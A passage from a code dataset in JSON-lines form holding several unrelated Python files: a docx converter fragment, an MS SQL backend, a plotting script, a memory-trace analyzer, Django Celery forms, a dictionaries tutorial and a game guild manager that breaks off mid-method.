self.get_first_element(node, \".//pStyle\")\r\n        if pStyle is None:\r\n            if self.in_list:\r\n                self.in_list = False\r\n                print(\"\", file=of)\r\n            self.parse_node(of, node)\r\n            print(\"\", file=of)\r\n            return\r\n\r\n        sub_text = self.get_sub_text(node)\r\n        if not sub_text:\r\n            return\r\n\r\n        if not self.in_list:\r\n            print(\"\", file=of)\r\n            self.in_list = True\r\n\r\n        style = pStyle.attrib[\"val\"]\r\n        if style.isdigit():\r\n            print(\"#\" * (int(style)), sub_text, file=of)\r\n        elif style[0] == \"a\":\r\n            ilvl = self.get_first_element(node, \".//ilvl\")\r\n            if ilvl is None:\r\n                return\r\n            level = int(ilvl.attrib[\"val\"])\r\n            print(\"    \" * level + \"*\", sub_text, file=of)\r\n        else:\r\n            raise RuntimeError(\"pStyle: \" + style)\r\n\r\n    def parse_drawing(self, of, node):\r\n        \"\"\"pictures\"\"\"\r\n        blip = self.get_first_element(node, \".//blip\")\r\n        if blip is None:\r\n            return\r\n\r\n        embed_id = blip.attrib.get(\"embed\")\r\n        if embed_id is None or embed_id not in self.media:\r\n            return\r\n\r\n        tag_id = f\"image{self.image_counter()}\"\r\n        print(f'<img id=\"{tag_id}\" src=\"{self.media[embed_id]}\">', end=\"\", file=of)","repo_name":"rfrezende/docx2md","sub_path":"docx2md/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":8003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"}
+{"seq_id":"19086099133","text":"import sys\nimport logging\nfrom time import time\nimport pyodbc as Database\n\nfrom orun.db import utils\nfrom orun.core.exceptions import ImproperlyConfigured\nfrom orun.db.backends.base.base import BaseDatabaseWrapper\nimport orun.db.backends.utils\nfrom .schema import DatabaseSchemaEditor\nfrom .client import DatabaseClient\nfrom .creation import DatabaseCreation\nfrom .features import DatabaseFeatures\nfrom .introspection import DatabaseIntrospection\nfrom .operations import DatabaseOperations\n\nlogger = 
logging.getLogger('orun.db.backends')\n\n\nclass DatabaseWrapper(BaseDatabaseWrapper):\n    connection: Database.Connection\n    vendor = 'mssql'\n    display_name = 'MS SQL Server'\n\n    data_types = {\n        'AutoField': 'int',\n        'BigAutoField': 'bigint',\n        'BinaryField': 'varbinary',\n        'BooleanField': 'bit',\n        'CharField': 'varchar(%(max_length)s)',\n        'DateField': 'date',\n        'DateTimeField': 'datetime',\n        'DecimalField': 'decimal(%(max_digits)s, %(decimal_places)s)',\n        'DurationField': 'bigint',\n        'FileField': 'varchar(%(max_length)s)',\n        'FilePathField': 'varchar(%(max_length)s)',\n        'FloatField': 'float',\n        'IntegerField': 'int',\n        'BigIntegerField': 'bigint',\n        'IPAddressField': 'char(15)',\n        'GenericIPAddressField': 'char(39)',\n        'OneToOneField': 'bigint',\n        'PositiveIntegerField': 'int',\n        'PositiveSmallIntegerField': 'smallint',\n        'SlugField': 'varchar(%(max_length)s)',\n        'SmallIntegerField': 'smallint',\n        'TextField': 'varchar(max)',\n        'TimeField': 'time',\n        'UUIDField': 'uniqueidentifier',\n    }\n\n    data_types_suffix = {\n        'AutoField': 'IDENTITY',\n        'BigAutoField': 'IDENTITY',\n    }\n\n    operators = {\n        'exact': '= %s',\n        'iexact': '= UPPER(%s)',\n        'contains': 'LIKE %s',\n        'icontains': 'LIKE UPPER(%s)',\n        'regex': 'LIKE %s',\n        'iregex': 'LIKE %s',\n        'gt': '> %s',\n        'gte': '>= %s',\n        'lt': '< %s',\n        'lte': '<= %s',\n        'startswith': 'LIKE %s',\n        'endswith': 'LIKE %s',\n        'istartswith': 'LIKE UPPER(%s)',\n        'iendswith': 'LIKE UPPER(%s)',\n    }\n\n    # The patterns below are used to generate SQL pattern lookup clauses when\n    # the right-hand side of the lookup isn't a raw string (it might be an expression\n    # or the result of a bilateral transformation).\n    # In those cases, special characters for LIKE operators (e.g. \\, *, _) should be\n    # escaped on database side.\n    #\n    # Note: we use str.format() here for readability as '%' is used as a wildcard for\n    # the LIKE operator.\n    pattern_esc = r\"REPLACE(REPLACE(REPLACE({}, '\\', '\\\\'), '%%', '\\%%'), '_', '\\_')\"\n    pattern_ops = {\n        'contains': r\"LIKE '%%' || {} || '%%' ESCAPE '\\'\",\n        'icontains': r\"LIKE '%%' || UPPER({}) || '%%' ESCAPE '\\'\",\n        'startswith': r\"LIKE {} || '%%' ESCAPE '\\'\",\n        'istartswith': r\"LIKE UPPER({}) || '%%' ESCAPE '\\'\",\n        'endswith': r\"LIKE '%%' || {} ESCAPE '\\'\",\n        'iendswith': r\"LIKE '%%' || UPPER({}) ESCAPE '\\'\",\n    }\n\n    Database = Database\n    SchemaEditorClass = DatabaseSchemaEditor\n    # Classes instantiated in __init__().\n    client_class = DatabaseClient\n    creation_class = DatabaseCreation\n    features_class = DatabaseFeatures\n    introspection_class = DatabaseIntrospection\n    ops_class = DatabaseOperations\n\n    def get_new_connection(self, conn_params):\n        options = self.settings_dict['OPTIONS']\n        if options.get('driver') == 'pytds':\n            import pytds\n            connection = pytds.connect(\n                server=conn_params['server'], database=conn_params['database'], port=conn_params['port'],\n                user=conn_params['user'], password=conn_params['password'], timeout=1000, login_timeout=100,\n            )\n        else:\n            connection = Database.connect(**conn_params)\n\n        # self.isolation_level must be set:\n        # - after connecting to the database in order to obtain the database's\n        #   default when no value is explicitly specified in options.\n        # - before calling _set_autocommit() because if autocommit is on, that\n        #   will set connection.isolation_level to ISOLATION_LEVEL_AUTOCOMMIT.\n        options = self.settings_dict['OPTIONS']\n        try:\n            self.isolation_level = options['isolation_level']\n        except KeyError:\n            self.isolation_level = 'READ COMMITTED'\n        else:\n            pass\n            # Set the 
isolation level to the value from OPTIONS.\n # if self.isolation_level != connection.isolation_level:\n # connection.set_session(isolation_level=self.isolation_level)\n\n return connection\n\n def get_connection_params(self):\n settings_dict = self.settings_dict\n if settings_dict['NAME'] == '':\n raise ImproperlyConfigured(\n \"settings.DATABASES is improperly configured. \"\n \"Please supply the NAME value.\")\n kwargs = {\n 'database': settings_dict['NAME'] or 'master',\n 'server': settings_dict['HOST'],\n 'port': settings_dict['PORT'],\n 'user': settings_dict['USER'],\n 'password': settings_dict['PASSWORD'],\n **settings_dict['OPTIONS'],\n }\n return kwargs\n\n def _set_autocommit(self, autocommit):\n with self.wrap_database_errors:\n self.connection.autocommit = autocommit\n\n def init_connection_state(self):\n pass\n\n def create_cursor(self, name=None):\n return self.connection.cursor()\n\n def make_cursor(self, cursor):\n \"\"\"Create a cursor without debug logging.\"\"\"\n if self.settings_dict['OPTIONS']['driver'] == 'pytds':\n return super().make_cursor(cursor)\n return CursorWrapper(cursor, self)\n\n def make_debug_cursor(self, cursor):\n if self.settings_dict['OPTIONS']['driver'] == 'pytds':\n return super().make_debug_cursor(cursor)\n return CursorDebugWrapper(cursor, self)\n\n def is_usable(self):\n try:\n self.connection.cursor().execute(\"SELECT 1\")\n except Database.Error:\n return False\n else:\n return True\n\n def call(self, proc_name: str, args = None):\n with self.cursor() as cur:\n stmt = f'EXEC {proc_name}'\n if args:\n stmt += ' ' + ','.join(['?' for arg in args])\n cur.execute(stmt, args)\n return cur\n\n\nclass CursorWrapper(orun.db.backends.utils.CursorWrapper):\n def execute(self, sql, params=None):\n return super().execute(sql.replace('%s', '?'), params)\n\n def executemany(self, sql, param_list):\n return super().executemany(sql.replace('%s', '?'), param_list)\n\n def _execute(self, sql, params, *ignored_wrapper_args):\n return super()._execute(sql.replace('%s', '?'), params, *ignored_wrapper_args)\n\n def _execute_with_wrappers(self, sql, params, many, executor):\n return super()._execute_with_wrappers(sql.replace('%s', '?'), params, many, executor)\n\n def close(self):\n pass\n\n\nclass CursorDebugWrapper(CursorWrapper):\n\n # XXX callproc isn't instrumented at this time.\n\n def execute(self, sql, params=None):\n start = time()\n try:\n return super().execute(sql, params)\n finally:\n stop = time()\n duration = stop - start\n sql = self.db.ops.last_executed_query(self.cursor, sql, params)\n self.db.queries_log.append({\n 'sql': sql,\n 'time': \"%.3f\" % duration,\n })\n logger.debug(\n '(%.3f) %s; args=%s', duration, sql, params,\n extra={'duration': duration, 'sql': sql, 'params': params}\n )\n\n def executemany(self, sql, param_list):\n start = time()\n try:\n return super().executemany(sql, param_list)\n finally:\n stop = time()\n duration = stop - start\n try:\n times = len(param_list)\n except TypeError: # param_list could be an iterator\n times = '?'\n self.db.queries_log.append({\n 'sql': '%s times: %s' % (times, sql),\n 'time': \"%.3f\" % duration,\n })\n logger.debug(\n '(%.3f) %s; args=%s', duration, sql, param_list,\n extra={'duration': duration, 'sql': sql, 'params': param_list}\n )\n","repo_name":"katrid/orun","sub_path":"orun/db/backends/mssql/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8542,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"2"} 
+{"seq_id":"1174613005","text":"import datetime\n\nimport matplotlib.dates as mdates\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndf = pd.read_table(\"hits_by_second.txt\", sep=\",\")\ndf.columns = [\"ts\", \"hits\"]\ndf[\"valid\"] = pd.to_datetime(df[\"ts\"], format=\"%Y%m%d%H%M%S\")\n\n(fig, ax) = plt.subplots(1, 1)\n\nax.bar(\n df[\"valid\"].values, df[\"hits\"].values, width=1 / 86400.0, ec=\"b\", fc=\"b\"\n)\nax.grid(True)\nax.set_xlim(\n datetime.datetime(2016, 11, 2, 22, 15),\n datetime.datetime(2016, 11, 2, 23, 15),\n)\nax.xaxis.set_major_formatter(mdates.DateFormatter(\"%-I:%M\"))\nax.set_xlabel(\"Evening of 2 Nov 2016, CDT\")\nax.set_ylabel(\"Website Requests per Second\")\n\nax.annotate(\n \"10:23 PM\\nRain Starts\",\n xy=(datetime.datetime(2016, 11, 2, 22, 23), 20000.0),\n xycoords=\"data\",\n xytext=(-50, 30),\n textcoords=\"offset points\",\n bbox=dict(boxstyle=\"round\", fc=\"0.8\"),\n arrowprops=dict(\n arrowstyle=\"->\", connectionstyle=\"angle,angleA=0,angleB=90,rad=1\"\n ),\n)\nax.annotate(\n \"10:54 PM\\nTarp is Rolled Out!\",\n xy=(datetime.datetime(2016, 11, 2, 22, 54), 20000.0),\n xycoords=\"data\",\n xytext=(-50, 30),\n textcoords=\"offset points\",\n bbox=dict(boxstyle=\"round\", fc=\"0.8\"),\n arrowprops=dict(\n arrowstyle=\"->\", connectionstyle=\"angle,angleA=0,angleB=90,rad=1\"\n ),\n)\n\nax.set_title(\"IEM WebFarm Traffic During 2016 Cubs+Indians Game 7\")\n\nfig.savefig(\"test.png\")\n","repo_name":"akrherz/DEV","sub_path":"matplotlib/website_hits.py","file_name":"website_hits.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"28503864458","text":"import io\nimport re\nimport sys\nimport collections\n\nallocations = {}\n\nAllocation = collections.namedtuple('Allocation', ['line', 'lineno', 'size'])\n\ninfile = io.TextIOWrapper(sys.stdin.buffer, encoding='latin-1')\n\nfor n, line in enumerate(infile.readlines()):\n # Make lines 1-based instead of 0-based\n n += 1\n\n match = re.match(r\"^malloc\\(([0-9]+)\\) = (0x[0-9A-F]+)$\", line)\n if match:\n allocations[match.group(2)] = Allocation(line = line, lineno = n, size = int(match.group(1)))\n continue\n\n match = re.match(r\"^realloc\\((0x[0-9A-F]+), ([0-9]+)\\) = (0x[0-9A-F]+)$\", line)\n if match:\n if match.group(1) != '0x0':\n try:\n allocations.pop(match.group(1))\n except KeyError:\n sys.stdout.write(\"{:3d}: {}\".format(n, line))\n sys.stdout.write(\">> {} not allocated\\n\".format(match.group(1)))\n continue\n\n allocations[match.group(3)] = Allocation(line = line, lineno = n, size = int(match.group(2)))\n continue\n\n match = re.match(r\"^free\\((0x[0-9A-F]+)\\)$\", line)\n if match:\n if (match.group(1) == '0x0'):\n continue\n try:\n allocations.pop(match.group(1))\n except KeyError:\n sys.stdout.write(\"{:3d}: {}\".format(n, line))\n sys.stdout.write(\">> {} not allocated\\n\".format(match.group(1)))\n continue\n\n continue\n\nfor addr, alloc in allocations.items():\n sys.stdout.write(\"{:3d}: {}\".format(alloc.lineno, alloc.line))\n sys.stdout.write(\">> {} never freed\\n\".format(addr))\n","repo_name":"matthijskooijman/scripts","sub_path":"embedded/memdebug/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"2"} +{"seq_id":"5825628379","text":"#coding=utf-8\r\nfrom __future__ import absolute_import, unicode_literals\r\n\r\nfrom django import forms\r\nfrom django.conf 
import settings\r\nfrom django.contrib import admin\r\nfrom django.forms.widgets import Select\r\nfrom django.template.defaultfilters import pluralize\r\nfrom django.utils.translation import ugettext_lazy as _\r\nfrom GOD import models\r\nfrom django.forms import fields as celery_fields\r\n# from django.forms import forms\r\n\r\n\r\nfrom celery import current_app\r\nfrom celery.utils import cached_property\r\nfrom kombu.utils.json import loads\r\n\r\nfrom django_celery_beat.models import (\r\n    PeriodicTask, PeriodicTasks,\r\n    IntervalSchedule, CrontabSchedule,\r\n    SolarSchedule\r\n)\r\nfrom django_celery_beat.utils import is_database_scheduler\r\n\r\nclass TaskSelectWidget(Select):\r\n    \"\"\"Widget that lets you choose between task names.\"\"\"\r\n\r\n    celery_app = current_app\r\n    _choices = None\r\n\r\n    def tasks_as_choices(self):\r\n        _ = self._modules  # noqa\r\n        tasks = list(sorted(name for name in self.celery_app.tasks\r\n                            if not name.startswith('celery.')))\r\n        return (('', ''), ) + tuple(zip(tasks, tasks))\r\n\r\n    @property\r\n    def choices(self):\r\n        if self._choices is None:\r\n            self._choices = self.tasks_as_choices()\r\n        return self._choices\r\n\r\n    @choices.setter\r\n    def choices(self, _):\r\n        # ChoiceField.__init__ sets ``self.choices = choices``\r\n        # which would override ours.\r\n        pass\r\n\r\n    @cached_property\r\n    def _modules(self):\r\n        self.celery_app.loader.import_default_modules()\r\nclass TaskChoiceField(forms.ChoiceField):\r\n    \"\"\"Field that lets you choose between task names.\"\"\"\r\n\r\n    widget = TaskSelectWidget\r\n\r\n    def valid_value(self, value):\r\n        return True\r\nclass PeriodicTaskForm(forms.ModelForm):\r\n    email_subject=celery_fields.CharField()\r\n    email_to=celery_fields.EmailField()\r\n    # email_from=celery_fields.EmailField()\r\n    email_content=celery_fields.CharField()\r\n    \"\"\"Form that lets you create and modify periodic tasks.\"\"\"\r\n    def __new__(cls, *args, **kwargs):\r\n        for field_name,field_obj in cls.base_fields.items():\r\n\r\n            # Check whether the field is among the read-only fields\r\n            field_obj.widget.attrs['class'] = 'form-control'\r\n\r\n\r\n        return forms.ModelForm.__new__(cls)\r\n    # def __init__(self,*args,**kwargs):\r\n    #     super(PeriodicTaskForm,self).__init__(*args,**kwargs)\r\n\r\n    #     self.fields[\"regtask\"].choices=TaskSelectWidget.choices\r\n    regtask = TaskChoiceField(\r\n        label=_('Task (registered)'),\r\n        required=False,\r\n    )\r\n\r\n    task = forms.CharField(\r\n        label=_('Task (custom)'),\r\n        required=False,\r\n        max_length=200,\r\n    )\r\n\r\n    class Meta:\r\n        \"\"\"Form metadata.\"\"\"\r\n\r\n        model = PeriodicTask\r\n        exclude = (\"interval\",\"solar\",\"kwargs\",\"queue\",\r\n                   \"exchange\",\r\n                   \"routing_key\",\r\n                   \"total_run_count\",\r\n                   \"args\",\r\n\r\n\r\n\r\n                   )\r\n\r\n    def clean(self):\r\n        data = super(PeriodicTaskForm, self).clean()\r\n        regtask = data.get('regtask')\r\n        if regtask:\r\n            data['task'] = regtask\r\n        if not data['task']:\r\n            exc = forms.ValidationError(_('Need name of task'))\r\n            self._errors['task'] = self.error_class(exc.messages)\r\n            raise exc\r\n        return data\r\n\r\n    def _clean_json(self, field):\r\n        value = self.cleaned_data[field]\r\n        try:\r\n            loads(value)\r\n        except ValueError as exc:\r\n            raise forms.ValidationError(\r\n                _('Unable to parse JSON: %s') % exc,\r\n            )\r\n        return value\r\n\r\n    def clean_args(self):\r\n        return self._clean_json('args')\r\n\r\n    def clean_kwargs(self):\r\n        return self._clean_json('kwargs')\r\n\r\n\r\n\r\n\r\n    # The code above is the celery ModelForm\r\n\r\n    #------------------------------------------------------\r\n\r\nclass 
TaskPlanForm(forms.ModelForm):\r\n class Meta:\r\n model=models.TaskPlan\r\n fields=\"__all__\"\r\n labels={\r\n \"name\":\"计划名称\",\r\n }\r\n\r\n\r\nclass TaskStageForm(forms.ModelForm):\r\n class Meta:\r\n model=models.TaskStage\r\n fields=\"__all__\"\r\n\r\n def __init__(self, *args, **kwargs):\r\n super(TaskStageForm, self).__init__(*args, **kwargs)\r\n print(self.fields)\r\n self.fields['taskplan_id'].choices = models.TaskPlan.objects.values_list(\"name\")\r\n # labels={\r\n # \"name\":\"计划名称\",\r\n # }\r\n\r\nclass TaskJobForm(forms.ModelForm):\r\n class Meta:\r\n model=models.TaskJob\r\n fields=\"__all__\"\r\n\r\nclass SSHTASKForm(forms.ModelForm):\r\n class Meta:\r\n model=models.SSHTASK\r\n fields=\"__all__\"\r\n\r\nclass PIPtaskForm(forms.ModelForm):\r\n class Meta:\r\n model=models.PIPtask\r\n fields=\"__all__\"\r\n\r\nclass GITTASKForm(forms.ModelForm):\r\n class Meta:\r\n model=models.GITTASK\r\n fields=\"__all__\"","repo_name":"kaiven11/GODEYE","sub_path":"GOD/froms.py","file_name":"froms.py","file_ext":"py","file_size_in_byte":4988,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"20708720587","text":"#Dictionaries, they are defined by key : value pairs\n\nstudent = {'name':'Erastus','Adm':'ci/00030/017'}\nprint(student['Adm'])\n\n# working with dictionaries\n\nstudent = {'name':'Erastus','Adm':'ci/00030/017'}\n\n# adding new values to dictionaries\n\nstudent['age'] = 22\nstudent['nationality'] = 'kenyan'\n\nprint(student)\n\n# modyfying values in dictionaries\n\nrobot = {'vector_1': 9,\"vector_2\":8,'speed':'medium'}\n\nif robot['speed'] == \"slow\":\n vector_change = 3\nelif robot['speed'] == \"medium\" :\n vector_change = 10\nelse:\n vector_change = 6\n\nrobot['vector_1'] = robot['vector_1'] - vector_change\nprint(robot)\n\nprint(f\"this is the new vector postion for vector 1, {robot['vector_1']}\")\n\n# removing key value pairs, we use the del function followed by dic'name and key\n\ndel robot['vector_2']\n\nprint(robot)\n \n\n# using get() to access specific values\n# get function can be used to pass two arguments i.e when a key doesnt exist in a dictionary, it passes the second argument\n\nrobot_2 = robot.get('vector_1',\"vector 2 may not exist\")\nprint(robot_2)\n\n# Looping through dictionaries\n# method 1\n\nnames = {'Erastus':'Andedo',\n'Tonny':'Blair',\n'Sydney':'Andedo',\n'Emmanuel':'Andedo',\n}\n\nfor fname,lname in names.items():\n print(f\"first name:{fname}\")\n print(f\"last name :{lname}\")\n\n\n# method 2 using the key() method\n\nnames = {'Erastus':'Andedo',\n'Tonny':'Blair',\n'Sydney':'Andedo',\n'Emmanuel':'Andedo',\n}\n\nfor name in names.keys():\n print(f\"first name is:{name.upper()}\")\n\nfor name in names.values():\n print(name.upper())\n\n#monday session working with dictionaries and looping in a particular order\n\nnames = {'Erastus':'Andedo',\n'Tonny':'Blair',\n'Sydney':'Andedo',\n'Emmanuel':'Andedo',\n}\n \nfor person in sorted(names.keys()):\n print(person)\n\nfor person in set(names.values()):\n print(person.upper())\n\n\n\n\n\n\n\n\n\n\n","repo_name":"everlearner-bee/RAS","sub_path":"dictionaries.py","file_name":"dictionaries.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"8190431591","text":"from direct.directnotify import DirectNotifyGlobal\nfrom direct.distributed.DistributedObjectGlobalUD import DistributedObjectGlobalUD\nfrom direct.fsm.FSM import FSM\nfrom otp.otpbase 
import OTPUtils, OTPGlobals\nfrom otp.uberdog.RejectCode import RejectCode\nimport time\n\nGUILDRANK_VETERAN = 4\nGUILDRANK_GM = 3\nGUILDRANK_OFFICER = 2\nGUILDRANK_MEMBER = 1\n\nclass OperationFSM(FSM):\n DELAY = 0.25\n\n def __init__(self, mgr, sender, target=None):\n FSM.__init__(self, 'OperationFSM-%s' % sender)\n self.mgr = mgr\n self.air = mgr.air\n self.sender = sender\n self.target = target\n self.deleted = False\n \n if self.DELAY:\n self.mgr.operations[self.sender] = self\n \n def fsmName(self, name):\n return 'OperationFSM-%s-%s' % (id(self), name)\n \n def deleteOperation(self):\n if not self.deleted:\n if self.DELAY:\n taskMgr.doMethodLater(self.DELAY, self.__deleteOperation, self.fsmName('deleteOperation'))\n \n self.deleted = True\n \n def __deleteOperation(self, task):\n if self.sender in self.mgr.operations:\n del self.mgr.operations[self.sender]\n\n def enterOff(self):\n self.deleteOperation()\n \n def enterError(self, message=None):\n self.mgr.notify.warning(\"An error has occurred in a '%s'. Message: %s\" % (self.__class__.__name__, message))\n self.deleteOperation()\n\nclass RetrievePirateOperation(OperationFSM):\n \n def enterStart(self):\n self.air.dbInterface.queryObject(self.air.dbId, self.sender, self.__retrievedPirate)\n \n def __retrievedPirate(self, dclass, fields):\n if dclass != self.air.dclassesByName['DistributedPlayerPirateUD']:\n self.demand('Error', 'Sender is not a pirate.')\n return\n\n self.pirate = fields\n self.demand('RetrievedPirate')\n \n def enterRetrievedPirate(self):\n pass\n\nclass RetrievePirateGuildOperation(RetrievePirateOperation):\n\n def enterRetrievedPirate(self):\n self.guildId = self.pirate.get('setGuildId', [0])[0]\n \n if not self.guildId:\n self.demand('Off')\n return\n \n self.air.dbInterface.queryObject(self.air.dbId, self.guildId, self.__retrievedGuild)\n \n def __retrievedGuild(self, dclass, fields):\n if dclass != self.air.dclassesByName['DistributedGuildUD']:\n self.demand('Error', 'Guild ID is not linked to a guild.')\n return\n\n self.guild = fields\n self.members = [list(member) for member in fields['setMembers'][0]]\n self.mgr.addMemberList(self.guildId, self.members)\n self.demand('RetrievedGuild')\n \n def enterRetrievedGuild(self):\n pass\n \n def getMember(self, avId):\n for i, member in enumerate(self.members):\n if member[0] == avId:\n return i, member\n \n return 0, None\n \n def isMember(self, avId):\n for i, member in enumerate(self.members):\n if member[0] == avId:\n return True\n \n return False\n \n def updateMembers(self, members):\n self.mgr.addMemberList(self.guildId, members)\n self.air.dbInterface.updateObject(self.air.dbId, self.guildId, self.air.dclassesByName['DistributedGuildUD'], {'setMembers': [members]})\n \n def convertMember(self, member):\n avId, rank, name, _, _ = member\n online = avId in self.air.piratesFriendsManager.onlinePirates\n bandManagerId = 0\n bandId = 0\n \n return [avId, name, rank, online, bandManagerId, bandId]\n\nclass UpdatePirateExtension(object):\n\n def enterUpdatePirate(self, avatar, guildId, guildName, rank):\n dclass = self.air.dclassesByName['DistributedPlayerPirateUD']\n \n self.air.send(dclass.aiFormatUpdate('setGuildId', avatar, avatar, self.air.ourChannel, [guildId]))\n self.air.send(dclass.aiFormatUpdate('setGuildName', avatar, avatar, self.air.ourChannel, [guildName]))\n self.mgr.d_guildStatusUpdate(avatar, guildId, guildName, rank)\n self.demand('Off')\n\nclass CreateGuildOperation(RetrievePirateOperation, UpdatePirateExtension):\n name = 'Pirate Guild'\n rank = 
GUILDRANK_GM\n\n def enterRetrievedPirate(self):\n guildId = self.pirate.get('setGuildId', [0])[0]\n\n if guildId:\n self.demand('Off')\n return\n \n gold = self.pirate['setGoldInPocket'][0]\n \n if gold < OTPGlobals.GUILD_COST:\n self.demand('Off')\n return\n\n dclass = self.air.dclassesByName['DistributedPlayerPirateUD']\n self.air.send(dclass.aiFormatUpdate('setGoldInPocket', self.sender, self.sender, self.air.ourChannel, [gold - OTPGlobals.GUILD_COST]))\n\n name = self.pirate['setName'][0]\n fields = {\n 'setName': [self.name],\n 'setWishName': [''],\n 'setOldName': [''],\n 'setMembers': [[[self.sender, GUILDRANK_GM, name, 0, 0]]]\n }\n self.air.dbInterface.createObject(self.air.dbId, self.air.dclassesByName['DistributedGuildUD'], fields, self.__createdGuild)\n \n def __createdGuild(self, doId):\n if not doId:\n self.demand('Error', \"Couldn't create guild object on the database.\")\n return\n\n self.demand('UpdatePirate', self.sender, doId, self.name, GUILDRANK_GM)\n\nclass PirateOnlineOperation(RetrievePirateGuildOperation, UpdatePirateExtension):\n DELAY = 0.0\n \n def enterRetrievedGuild(self):\n self.guildName = self.guild['setName'][0]\n pirateName = self.pirate['setName'][0]\n i, self.member = self.getMember(self.sender)\n \n if not self.member:\n self.demand('Off')\n return\n\n if self.member[2] != pirateName:\n self.member[2] = pirateName\n self.members[i] = self.member\n self.updateMembers(self.members)\n\n memberList = self.mgr.getMemberIds(self.guildId)\n self.mgr.d_recvAvatarOnline(memberList, self.sender, pirateName)\n self.demand('CheckName')\n \n def enterCheckName(self):\n if not self.guild['setWishName'][0]:\n self.demand('Finish')\n return\n \n self.wishName = self.guild['setWishName'][0]\n self.mgr.air.csm.accountDB.getGuildNameStatus(self.wishName, self.__gotGuildNameStatus, 'Check')\n\n def __gotGuildNameStatus(self, status):\n if status == 0:\n self.demand('Finish')\n return\n \n memberList = self.mgr.getMemberIds(self.guildId)\n \n if not memberList:\n self.demand('Finish')\n return\n\n if status == 1:\n self.air.dbInterface.updateObject(self.air.dbId, self.guildId, self.air.dclassesByName['DistributedGuildUD'], {'setWishName': ['']})\n self.mgr.d_guildNameChange(memberList, self.wishName, status)\n self.demand('Finish')\n return\n\n oldName = self.guildName\n self.guildName = self.wishName\n self.air.dbInterface.updateObject(self.air.dbId, self.guildId, self.air.dclassesByName['DistributedGuildUD'], {'setWishName': [''], 'setName': [self.wishName]})\n self.mgr.d_guildNameChange(memberList, self.wishName, status)\n \n dclass = self.air.dclassesByName['DistributedPlayerPirateUD']\n \n for memberId in memberList:\n i, member = self.getMember(memberId)\n\n self.air.send(dclass.aiFormatUpdate('setGuildName', memberId, memberId, self.air.ourChannel, [self.guildName]))\n self.mgr.d_guildStatusUpdate(memberId, self.guildId, self.guildName, member[1])\n \n if oldName != 'Pirate Guild':\n self.demand('RemoveName', oldName)\n else:\n self.demand('Off')\n \n def enterRemoveName(self, guildName):\n self.mgr.air.csm.accountDB.getGuildNameStatus(guildName, lambda status: None, 'Remove')\n self.demand('Off')\n \n def enterFinish(self):\n self.demand('UpdatePirate', self.sender, self.guildId, self.guildName, self.member[1])\n\nclass PirateOfflineOperation(RetrievePirateOperation):\n DELAY = 0.0\n\n def enterRetrievedPirate(self):\n guildId = self.pirate.get('setGuildId', [0])[0]\n \n if not guildId:\n self.demand('Off')\n return\n \n memberList = 
self.mgr.getMemberIds(guildId)\n \n if not memberList:\n self.demand('Off')\n return\n \n self.mgr.d_recvAvatarOffline(memberList, self.sender, self.pirate['setName'][0])\n self.demand('Off')\n\nclass RemoveMemberOperation(RetrievePirateGuildOperation, UpdatePirateExtension):\n \n def enterRetrievedGuild(self):\n memberList = self.mgr.getMemberIds(self.guildId)\n i, senderMember = self.getMember(self.sender)\n \n if not senderMember:\n self.demand('Off')\n return\n\n j, targetMember = self.getMember(self.target)\n \n if not targetMember:\n self.demand('Off')\n return\n\n senderRank = senderMember[1]\n targetRank = targetMember[1]\n selfKick = self.sender == self.target\n \n if not selfKick and senderRank not in (GUILDRANK_OFFICER, GUILDRANK_GM):\n self.demand('Off')\n return\n \n if targetRank == GUILDRANK_GM and len(self.members) > 1:\n self.demand('Off')\n return\n \n if senderRank == GUILDRANK_OFFICER and not selfKick:\n senderTime = senderMember[3]\n senderKickNum = senderMember[4]\n currentTime = int(time.time())\n \n if senderTime != 0 and senderTime > currentTime and senderKickNum == 5:\n self.mgr.d_notifyGuildKicksMaxed(self.sender)\n self.demand('Off')\n return\n \n if senderTime == 0 or senderTime <= currentTime:\n senderMember[3] = currentTime + 86400 # One day\n senderMember[4] = 1\n else:\n senderMember[4] += 1\n\n self.members[i] = senderMember\n\n guildName = self.guild['setName'][0]\n name = targetMember[2]\n\n del self.members[j]\n self.updateMembers(self.members)\n self.mgr.d_recvMemberRemoved(memberList, self.target, self.sender, name, senderMember[2])\n \n if len(self.members) == 0 and guildName != 'Pirate Guild':\n self.demand('RemoveName', guildName)\n else:\n self.demand('Finish')\n \n def enterRemoveName(self, guildName):\n self.mgr.air.csm.accountDB.getGuildNameStatus(guildName, lambda status: None, 'Remove')\n self.demand('Finish')\n \n def enterFinish(self):\n self.demand('UpdatePirate', self.target, 0, '', 0)\n\nclass MemberListOperation(RetrievePirateGuildOperation):\n DELAY = 1.5\n \n def enterRetrievedGuild(self):\n memberInfo = [self.convertMember(member) for member in self.members]\n self.mgr.d_receiveMembers(self.sender, memberInfo)\n self.demand('Off')\n\nclass RequestInviteOperation(RetrievePirateGuildOperation):\n DELAY = 1.5\n \n def enterRetrievedGuild(self):\n if self.isMember(self.target):\n self.mgr.d_guildRejectInvite(self.sender, RejectCode.ALREADY_IN_GUILD)\n self.demand('Off')\n return\n \n _, member = self.getMember(self.sender)\n \n if (not member) or member[1] == GUILDRANK_MEMBER:\n self.demand('Off')\n return\n\n self.air.dbInterface.queryObject(self.air.dbId, self.target, self.__retrievedPirate)\n \n def __retrievedPirate(self, dclass, fields):\n if dclass != self.air.dclassesByName['DistributedPlayerPirateUD']:\n self.demand('Error', 'Sender is not a pirate.')\n return\n\n if fields.get('setGuildId', [0])[0]:\n self.mgr.d_guildRejectInvite(self.sender, RejectCode.ALREADY_IN_GUILD)\n self.demand('Off')\n return\n \n self.mgr.addInvitation(self.sender, self.target, self.pirate['setName'][0], self.guildId, self.guild['setName'][0])\n self.demand('Off')\n\nclass AddMemberOperation(RetrievePirateGuildOperation, UpdatePirateExtension):\n DELAY = 1.5\n \n def enterRetrievedGuild(self):\n if self.isMember(self.target):\n 